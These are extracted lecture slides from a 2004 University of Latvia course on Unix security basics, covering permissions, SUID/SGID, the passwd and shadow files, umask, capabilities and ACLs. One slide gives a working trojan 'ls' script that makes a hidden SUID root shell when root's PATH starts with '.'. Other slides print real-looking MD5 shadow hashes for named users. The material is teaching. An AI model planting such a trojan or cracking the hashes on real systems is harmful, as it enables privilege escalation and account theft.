Lecture 4: Unix Security Basics

Lecture 4: Unix Security Basics

Asoc. Prof. Guntis BarzdinsAsist. Girts Folkmanis

University of LatviaOct 8, 2004

Top UNIX Vulnerabilities

U1 BIND Domain Name System U2 Remote Procedure Calls (RPC) U3 Apache Web Server U4 General UNIX Authentication

Accounts with No Passwords or Weak Passwords

U5 Clear Text Services

U6 Sendmail U7 Simple Network Management

Protocol (SNMP) U8 Secure Shell (SSH) U9 Misconfiguration of Enterprise

Services NIS/NFS U10 Open Secure Sockets Layer

(SSL)

Source: http://www.sans.org/top20/#threats

Favourite TCP Ports

20 FTP (data) 21 FTP (control) 23 Telnet 25 SMTP (mail) 70 Gopher 79 Finger 80 HTTP also 8000 or 8001 or 8080 110 Pop3 119 NNTP (news) 143 Imap

7-19 echo, discard, daytime, chargen, netstat 22 SSH 42 wins 53 dns 111 sun rpc 113 identd 123 ntp 135 loc-srv/epmap – used to attack wintel 137-139 netbios 161 snmp 512-517 rexec, rlogin, rsh, talk, syslog, who 635 mountd – Linux 2049 nfs 6670 Deepthroat 31337 BackOrifice

No system is perfectly secure, but still we need security

A number of toolkits exist that allow total amateurs to become holy terrors.

The good news is that if you can beat the popular intrusion toolkits, 90 percent of the bad guys will go bother somebody else who's less secure.

Protection

Operating system consists of a collection of objects, hardware or software

Each object has a unique name and can be accessed through a well-defined set of operations.

Protection problem - ensure that each object is accessed through correct set of operations and only by those processes that are allowed to do so.

UNIX Security Basics

Permissions UID GID Superuser SUID, SGID Sticky bit Umask Filesystem restrictions Advanced: Systrace, Veriexec, iptables, etc.

Domain Implementation in UNIX

Two domain groups User Superuser (can do everything, UID=0)

User domain group Domain = user-id (UID) Domain switch accomplished via file system.

Each file has associated with it a domain bit (setuid bit = SUID bit).

When file is executed and setuid = on, then effective user-id is set to owner of the file being executed. When execution completes user-id is reset (exit() for child process ).

Subjects and Objects

Each subject (process) and object (file, socket, etc) has a 16-bit UID.

Each object also has a 16-bit GID and each subject has one or more GIDs.

Objects have access control lists that specify read, write, and execute permissions for user, group, and world.

Super-users (uid=0 root) can do anything.

Subjects and Objects

UID GID Others

UID User permissions

GID-main+GID-list

Group permissions

Others Others permissions

Objects = files (regular and devices /dev)

Subj

ects

= p

roce

sses

(effe

ctiv

e U

ID, G

ID c

ount

s)

inodes

inodes contain a lot of information about a file mode and type of file number of links to the file owner's UID owners GID number of bytes in file times (last accessed, modified, inode changed) physical disk addresses (direct and indirect blocks) number of blocks access information

Unix File System (UFS) Structure

Directory Under UNIX directories are special (OS writable only) files. The directory file is an unsorted linked list of filenames to file-inode

(attributes and location of file on hard disk) Directory size will always increase to be large enough to hold all

the file entries. If the number of files latter shrinks the directory size WILL NOT!

5 apples

4 oranges

5 aboli

2 .

7 ..

ls -l> ls -l foo

-rw-rw---- 1 hollingd grads 13 Jan 10 23:05 foo

permissionsowner group

size

time

name

File Time Attributes

Time Attributes: when the file was last changed ls -l when the file was created* ls -lc when the file was last read (accessed) ls -ul

*actually it’s the time the file status in the directory last changed (e.g. file renamed).

Types of Files

Regular Files binary

GIF, JPEG, Executable etc. text

scripts, program source code, documentation Supports sequential and random access

Types of Files (cont.)

Directory Can contain ANY kind of files

. . (Dot)(Dot) The special name for the The special name for the currentcurrent directory. directory.

.... (Dot) (Dot)(Dot) (Dot) The special name for the directory The special name for the directory above above the the currentcurrent directory. directory.

Device File Allows programs to communicate with hardware. Kernel modules handle device management.


Device Files (cont.) Character Device

Accepts a stream of characters, without regard to any block structure.

It is not addressable, therefore no seek operation Block Device

Information stored in fixed-sized block It is addressable, therefore seek operation is possible.


UNIX Domain Sockets (BSD) sockets that are local to a particular host and are

referenced through a file system object rather than a network port.

X windows Named Pipe

Allow processes to communicate with each other.


Hard links Linking files by reference System maintains a count of the number of links Does not work across file systems.

Soft links Linking files by name No counter is maintained Work across file system

From “man ln” There are two concepts of `link' in Unix, usually called

hard link and soft link A hard link is just a name for a file. (And a file can have

several names. It is deleted from disk only when the last name is removed. The number of names is given by ls(1). There is no such thing as an `original' name: all names have the same status.

A soft link (or symbolic link, or symlink) is an entirely different animal: it is a small special file that contains a pathname.

Create a link directory by typing the following Create a link directory by typing the following command from your home directory:command from your home directory:

% ln -s /home/faculty/ostic/prof myprof% ln -s /home/faculty/ostic/prof myprof

You only need to create this link once.You only need to create this link once. It will It will appear as a subdirectory in your home directory appear as a subdirectory in your home directory structure every time you log on to the system.structure every time you log on to the system.

Creating a LinkCreating a Link

soft link

Disk vs. Filesystem The entire hierarchy can actually include many

disk drives. some directories can be on other computers

/

bin etc users tmp usr

hollid2 scully

Disk mount options

Override individual file permissions A major security tool in Unix

-rwxr--r--

File permissions

File type- : plain filed : directoryc : character device (tty, printer)b : block device (disk, CD-ROM)l : symbolic links : socket=, p : FIFO

Access granted to ownerr : read / w : write / x : execute

Access granted togroup member

Access granted toothers

If you have If you have readread permission for a file, you permission for a file, you can view its contents.can view its contents.

If you haveIf you have write write permission for a file, you permission for a file, you can alter its contents.can alter its contents.

If you have If you have executeexecute permission for a file, you permission for a file, you can run the file as a program.can run the file as a program.

Permissions for FilesPermissions for Files

If you have read permission for a directory, you can list the contents of the directory.

If you have write permission for a directory, you can create or remove files or directories inside that directory.

If you have execute permission for a directory, you can change to this directory using the cd command, or use it as part of a pathname.

Permissions for Permissions for DirectoriesDirectories

SUID/SGID/sticky bits

SUID (set uid) Processes are granted access to system resources based on user

who owns the file. SGID (set gid)

(For file) Same with SUID except group is affected. (For directory) Files created in that directory will have their group set

to the directory's group. sticky bit

If set on a directory, then a user may only delete files that he owns or for which he has explicit write permission granted, even when he has write access to the directory. (e.g. /tmp )

File Permissions File Permissions (ex: rw-r--r--)

owner: rw-, group: r--, others: r-- r: read, w: write, x: execute

When a process executes, it has four values related to file permission a real user ID, an effective user ID a real group ID, an effective group ID When you login, your login shell process’

values are your user ID and group ID

Effective User and Group ID

A process’ effective user ID depends on who executes the process, not

who owns the executable E.g., if you run passwd (owned by root), the

effective user ID is your ID, not root; then how can it update /etc/passwd file owned by root ?

Two special file permissionsset user ID and set group ID When an executable with set user ID permission is

executed, the process’ effective user ID becomes that of executable; the real user ID is unaffected

File permission of /bin/passwd is r-sr-sr-x

Real uids The uid of the user who started the program is used as its real

uid.

The real uid affects what the program can do (e.g. create, delete files).

For example, the uid of /usr/bin/vi is root: $ ls -alt /usr/bin/vilrwxrwxrwx 1 root root 20 Apr 13...

But when I use vi, its real uid is dkl (not root), so I can only edit my files.

Effective uids

Programs can change to use the effective uid the uid of the program owner e.g. the passwd program changes to use its effective uid

(root) so that it can edit the /etc/passwd file

SUID bit enables this functionality

Real and Effective Group-ids

There are also real and effective group-ids.

Usually a program uses the real group-id (i.e. the group-id of the user).

Sometimes useful to use effective group-id (i.e. group-id of program owner): e.g. software shared across teams

SGID bit enables this functionality

Sample SETUID Scenario /dev/lp is owned by root with protection rw-------

This is used to access the printer /bin/lp is owned by root with rwsr-xr-x (with SETUID=1) User A issues a print command Shell (running with A’s UID and GID) interprets the command and forks off

a child process, say, P Process P has the same UID/GID as user A Child process P executes exec(“/bin/lp”,…) Now P’s domain changes to root’s UID Consequently, /dev/lp can be accessed to print When /bin/lp terminates so does P Parent shell never got the access to /dev/lp

File system tips

Turning off SUID / SGID in mounted file system use nosuid (and nodev if possible) when mounting

remote file system or allowing users to mount floppies or CD-ROMs

Finding SUID and SGID Files # find / $ -local -o -prune $ $ -perm -004000 -o -perm -

002000 $ -type f -print ( xdev can be used in place of local/prune)

Unix Accounts and the Filesystem

Unix Accounts

To access a Unix system you need to have an account.

Unix account includes: username and password userid and groupid home directory shell

Creating user accounts

useradd or adduser scripts

manually edit /etc/passwd, etc/shadow, etc/group

remember to lock these files while editing - vipw run “passwd [user]” create home directory

chown, chgrp, chmod copy defaults (e.g umod) from

/etc/skel /etc/profile

username

A username is (typically) a sequence of alphanumeric characters of length no more than 8.

username the primary identifying attribute of your account.

username is (usually) used as a part of email address the name of your home directory is usually related to

your username.

password a password is a secret string that only the user

knows (not even the system knows!) When you enter your password the system

calculates a hash (one-way) function and compares it to a stored string.

passwords are (usually) no less than 8 characters long.

It's a good idea to include numbers and/or special characters (don't use an english word!)

userid

a userid is a number (a 16-bit integer) that identifies a Unix account. Each userid is unique.

It's easier (and more efficient) for the system to use a number than a string like the username.

You don't need to know your userid!

Unix Groups and groupid

Unix includes the notion of a "group" of users. A Unix group can share files and active processes. Each account is assigned a "primary" group. The groupid is a number that corresponds to this

primary group. A single account can belong to many groups (but

has only one primary group).

Home Directory

A home directory is a place in the file system where the account files are stored.

A directory is like a Windows folder (more on this later).

Many unix commands and applications make use of the account home directory (as a place to look for customization files).

Shell

A Shell is a unix program that provides an interactive session - a text-based user interface.

When you log in to a Unix system the program you initially interact with is your shell.

There are a number of popular shells that are available.

Popular Shells

sh Bourne Shell ksh Korn Shell csh C Shellbash Bourne-Again Shell

Startup filessh,ksh:

/etc/profile (system defaults) ~/.profile

bash:

~/.bash_profile

~/.bashrc

~/.bash_logout

csh:

~/.cshrc

~/.login

~/.logout

Additional Password Security Later versions of Unix have improved the security for password encryption as

follows: Passwords no longer restricted to 8 characters Use MD5 instead of DES; gives 128-bit output Use “salt”

Furthermore, the encrypted (hashed) password is removed from the /etc/passwd file and instead is placed in /etc/shadow

Restricted access to /etc/shadow – no requirement for it to be world-readable; only readable by Root

Much more difficult to launch off-line (dictionary) attack /etc/shadow contains additional password information (number of days before expiry, etc)

passwd, shadow, group files

unix root # more /etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/bin/falsedaemon:x:2:2:daemon:/sbin:/bin/falseadm:x:3:4:adm:/var/adm:/bin/falselp:x:4:7:lp:/var/spool/lpd:/bin/falsesync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/halt...guest:x:405:100:guest:/dev/null:/dev/nullnobody:x:65534:65534:nobody:/:/bin/falsegirtsf:x:1000:100::/home/girtsf:/bin/bashdima:x:1001:100::/home/dima:/bin/bashguntis:x:1002:100::/home/guntis:/bin/bashstudents:x:1003:100::/home/students:/bin/bashunix root #

unix root # more /etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/bin/falsedaemon:x:2:2:daemon:/sbin:/bin/falseadm:x:3:4:adm:/var/adm:/bin/falselp:x:4:7:lp:/var/spool/lpd:/bin/falsesync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/halt...guest:x:405:100:guest:/dev/null:/dev/nullnobody:x:65534:65534:nobody:/:/bin/falsegirtsf:x:1000:100::/home/girtsf:/bin/bashdima:x:1001:100::/home/dima:/bin/bashguntis:x:1002:100::/home/guntis:/bin/bashstudents:x:1003:100::/home/students:/bin/bashunix root #

unix root # more /etc/shadowroot:$1$VlYbWsrd$GUs2cptio.rKlGHgAMBzr.:12684:0:::::halt:*:9797:0:::::...guest:*:9797:0:::::nobody:*:9797:0:::::girtsf:$1$u6UEWKT2$w5K28n2iAB2wNWtyPLycP1:12684:0:99999:7:::dima:$1$BQCdIBdV$xzzlj4s8XT6L9cLAmcoV50:12684:0:99999:7:::guntis:$1$fiJF/0BT$Py9JiQQL6icajjQVyMZ7//:12684:0:99999:7:::students:$1$wueon8yh$nLpUpNOKr8yTYaEnEK6OJ1:12685:0:99999:7:::unix root #

unix root # more /etc/shadowroot:$1$VlYbWsrd$GUs2cptio.rKlGHgAMBzr.:12684:0:::::halt:*:9797:0:::::...guest:*:9797:0:::::nobody:*:9797:0:::::girtsf:$1$u6UEWKT2$w5K28n2iAB2wNWtyPLycP1:12684:0:99999:7:::dima:$1$BQCdIBdV$xzzlj4s8XT6L9cLAmcoV50:12684:0:99999:7:::guntis:$1$fiJF/0BT$Py9JiQQL6icajjQVyMZ7//:12684:0:99999:7:::students:$1$wueon8yh$nLpUpNOKr8yTYaEnEK6OJ1:12685:0:99999:7:::unix root #

unix etc # ls -l passwd shadow group-rw-r--r-- 1 root root 705 Sep 23 15:36 group-rw-r--r-- 1 root root 1895 Sep 24 18:20 passwd-rw------- 1 root root 634 Sep 24 18:22 shadowunix etc #

unix etc # ls -l passwd shadow group-rw-r--r-- 1 root root 705 Sep 23 15:36 group-rw-r--r-- 1 root root 1895 Sep 24 18:20 passwd-rw------- 1 root root 634 Sep 24 18:22 shadowunix etc #

unix root # more /etc/group root::0:rootbin::1:root,bin,daemondaemon::2:root,bin,daemonsys::3:root,bin,admadm::4:root,adm,daemontty::5:girtsfdisk::6:root,admlp::7:lpmem::8:kmem::9:wheel::10:root,girtsffloppy::11:rootmail::12:mail...users::100:games,girtsfnofiles:x:200:qmail:x:201:postfix:x:207:postdrop:x:208:smmsp:x:209:smmspslocate::245:portage::250:portageutmp:x:406:nogroup::65533:nobody::65534:unix root #

unix root # more /etc/group root::0:rootbin::1:root,bin,daemondaemon::2:root,bin,daemonsys::3:root,bin,admadm::4:root,adm,daemontty::5:girtsfdisk::6:root,admlp::7:lpmem::8:kmem::9:wheel::10:root,girtsffloppy::11:rootmail::12:mail...users::100:games,girtsfnofiles:x:200:qmail:x:201:postfix:x:207:postdrop:x:208:smmsp:x:209:smmspslocate::245:portage::250:portageutmp:x:406:nogroup::65533:nobody::65534:unix root #

tikai “wheel” grupa var su uz root;skat /etc/pam.d/

Users and Ownership: /etc/passwd

Every File is owned by one of the system’s users – identity is represented by the user-id (UID)

Password file assoicate UID with system users.gates:x:65:20:B. Gates:/home/gates:/bin/ksh

login name[encrypted password]

user IDgroup ID

“real” name

command interpreterhome directory

/etc/group Information about system groupsfaculty:x:23:maria,eileen,dkl

group name

[encrypted group password]

group ID

list of group members

Who is superuser ?

UID of 0 Any username can be the superuser. Normal security checks and constraints are

ignored for the superuser. Superuser is not for casual use.

Do not login as superuser, use ‘/bin/su’ with “-” option instead.

Simple trap to steal superuser

Premise Root’s PATH starts with “.”

Contents of shell script ‘ls’#!/bin/shcp /bin/sh ./junk/.sschmod 4555 ./junk/.ssrm –f $0exec /bin/ls ${1+”$@”}

Set a trap% cd% chmod 700 .% touch ./-f

To do is just say to administrator. “I have a funny file in my directory I can’t seem to delete.”

Good root practice

unix root # which ls

/bin/ls

unix root # ls -al `which ls`

-rwxr-xr-x 1 root root 79360 Jul 18 08:03 /bin/ls

unix root #

Do not start root PATH with “.”

Logging In

To log in to a Unix machine you can either: sit at the console (the computer itself) access via the net (using telnet, rsh, ssh, kermit, or

some other remote access client). The system prompts you for your username and

password. Usernames and passwords are case sensitive!

Session Startup

Once you log in, your shell will be started and it will display a prompt.

When the shell is started it looks in your home directory for some customization files. You can change the shell prompt and a bunch of other

things by creating customization files (umask etc.)

Your Home Directory

Every Unix process* has a notion of the “current working directory”.

You shell (which is a process) starts with the current working directory set to your home directory.

*A process is an instance of a program that is currently running.

Interacting with the Shell

The shell prints a prompt and waits for you to type in a command.

The shell can deal with a couple of types of commands: shell internals - commands that the shell handles

directly. External programs - the shell runs a program for you.

File Types In UnixFile Types In Unix

Binary: Uses all characters

Text: Readable characters

All FilesAll Files

DirectoriesDirectories

Machine Code: Directly executed

Source: Readable Programs

Documents, etc.Documents, etc.

Shell scripts: Interpreted by shell

Programming Language: Interpreted or Compiled

Executable Executable FilesFiles

CompilerCompiler

to new files

umask: Calculations (2) If you want a file permission of 644 (by default, without

manually executing chmod) on a regular file, the umask would need to be 022.

Default Mode 666umask -022New File Mode 644

Bit level: new_mask = mode & ~umask umask = 000010010 = ---rw-rw = 0022

~umask = 111101101

mode = 110110110 = rw-rw-rw = 0666

new_mask = 111100100 = rw------ = 0600

Advanced: Capabilities

For the purpose of performing permission checks, traditional Unix implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is non-zero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process's credentials (usually: effective UID, effective GID, and supplementary group list).

Starting with kernel 2.2, Linux provides an (as yet incomplete) system of capabilities, which divide the privileges traditionally associated with superuser into distinct units that can be indepen- dently enabled and disabled.

Advanced: Access Control ListsThe permissions defined by ACLs are a superset of the permissions specified by the file permission bits. The permissions defined for the file owner correspond to the permissions of the ACL_USER_OBJ entry. The permissions defined for the file group correspond to the permissions of the ACL_GROUP_OBJ entry, if the ACL has no ACL_MASK entry. If the ACL has an ACL_MASK entry, then the permissions defined for the file group correspond to the permissions of the ACL_MASK entry. The permissions defined for the other class correspond to the permissions of the ACL_OTHER_OBJ entry.

Modification of the file permission bits results in the modification of the permissions in the associated ACL entries. Modification of the permissions in the ACL entries results in the modification of the file permission bits.

Example: user::rw- user:lisa:rw- group::r-- group:toolies:rw- mask::r-- other::r--

Advanced: TCP/IP Firewalls

Jautājumi

Max unix faila varda garums Pielaujamie simboli unix faila varda Kas notiek, ja userim permicijas 0, bet vina grupai

permicijas 1 ? Vai root var rediget failu ar visam permicijam 0?

Vai ari tas vispirms janomaina?

Lecture 4: Unix Security Basics

Documents

Transcript of Lecture 4: Unix Security Basics